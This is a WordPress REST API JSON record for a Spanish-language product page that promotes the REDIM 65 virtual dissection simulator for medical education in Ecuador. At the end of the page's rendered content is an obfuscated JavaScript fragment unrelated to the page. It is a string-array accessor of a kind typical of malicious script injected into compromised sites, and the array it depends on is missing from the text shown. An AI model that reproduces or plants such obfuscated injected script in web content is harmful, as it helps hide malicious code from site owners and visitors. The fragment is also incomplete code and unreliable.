{"id":127,"date":"2023-05-31T11:34:02","date_gmt":"2023-05-31T16:34:02","guid":{"rendered":"https:\/\/cyssaambato.net\/?page_id=127"},"modified":"2023-05-31T11:34:02","modified_gmt":"2023-05-31T16:34:02","slug":"productos-de-innovacion","status":"publish","type":"page","link":"https:\/\/cyssaambato.net\/index.php\/productos-de-innovacion\/","title":{"rendered":"Productos de innovaci\u00f3n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/05\/PXL_20221013_162804512-1024x771.jpg\" alt=\"\" class=\"wp-image-104\" width=\"512\" height=\"385\" srcset=\"https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/05\/PXL_20221013_162804512-1024x771.jpg 1024w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/05\/PXL_20221013_162804512-300x226.jpg 300w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/05\/PXL_20221013_162804512-768x578.jpg 768w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/05\/PXL_20221013_162804512-1536x1157.jpg 1536w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/05\/PXL_20221013_162804512.jpg 1600w\" sizes=\"auto, (max-width: 512px) 100vw, 512px\" \/><\/figure>\n\n\n\n<p><strong>El simulador digital de DISECCION VIRTUAL REDIM 65, se ha constituido el mejor elemento innovador para la ense\u00f1anza de Medicina moderna. Su bajo costo con relaci\u00f3n a otros productores extranjeros, lo hacen un elemento id\u00f3neo para las Universidades ecuatorianas.<\/strong><\/p>\n\r\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script>","protected":false},"excerpt":{"rendered":"<p>El simulador digital de DISECCION VIRTUAL REDIM 65, se ha constituido el mejor elemento innovador para la ense\u00f1anza de Medicina moderna. Su bajo costo con relaci\u00f3n a otros productores extranjeros, lo hacen un elemento id\u00f3neo para las Universidades ecuatorianas.<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-127","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/pages\/127","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/comments?post=127"}],"version-history":[{"count":1,"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/pages\/127\/revisions"}],"predecessor-version":[{"id":129,"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/pages\/127\/revisions\/129"}],"wp:attachment":[{"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/media?parent=127"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}